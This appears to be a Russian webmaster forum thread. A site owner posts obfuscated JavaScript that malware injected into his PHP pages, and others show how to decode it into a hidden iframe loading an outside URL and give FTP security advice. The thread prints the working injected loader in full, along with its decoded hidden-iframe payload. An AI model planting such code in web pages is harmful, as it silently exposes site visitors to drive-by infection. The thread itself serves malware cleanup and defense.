Троян на сайте, помогите расшифровать

[bouton]

Доброго времени суток. Сегодня обноружил на одном из своих сайтов вирус. Каспер не давал мне даже зайти на сайт. Обнаружилось что вирус добавлял в файлы index.php menu.php default.php вот этот год:

<script>
String.prototype.sdsd=function(d, o){return this.replace(d, o)};
var sadasd = '<KLiHKYfJYrNAaLJ5mAHeH @sLrY@cNH=Y@\'JLhY5tYY5tKpL@J:N/N/J@@c5l5i5Yc5LkKK-@NAsJa@Hp@HYeNJ.JcHHoKmHL/Li@Jn5.NKcKKLgKNiH?J2K\'Y @LwLYiKdJJJtH5hKL=N@\'L0AHp@5xY@\'KL Hh5JeHi@@gKYNh@AtAKL=N\'JJ0YpNHx5\'L Y5s5A5t@JyKAlL@HeL=\'5JvYAiALKsNiANbLJLiHlAiNtJ@Ly@:5 YhHiNNdd5JeHn55N;L JYYbYNoJrL@dAL5eJrHA:H AKnAAoKYLnAK5eJA;L5\'LN>AK<H/NiLfYY@rKHAaHLm@AeL>K'.sdsd(/[K5JANHYL@]/g,'');
document.write(sadasd);
</script>

Я удалил все его проделки но вот боюсь повторения этого.

Как мне расшифровать это дело? Кто нибудь может помочь? И ещё встречался ли кто нибудь с данным зверем, как его победить.
Спасибо за помощь

 

[Belial]

Как мне расшифровать это дело?

document.write(sadasd);
замени на
alert(sadasd);

 

[bouton]

document.write(sadasd);
замени на
alert(sadasd);

не охото экспериментировать на живом сайте. А что должно получиться?

 

[Belial]

Зачем же на живом, сохраняешь этот код в хтмл файл, меняешь и смотришь. Ифрейм там.

 

[shamantc]

<iframe src='http://click-sape.ru/in.cgi?2' width='0px' height='0px' style='visibility:hidden; border:none;'></iframe>

 

[Andrey-varvara]

Чтоб такое не повторилось:
1. скачай CureIT, проверь им те компы/ноутбуки с которых заходил по ФТП на сайт. 100% вирусня у тебя.
2. Поменяй пароль на фтп
3. Делай сложные пароли и НИКОГДА не храни их в ФТП менеджерах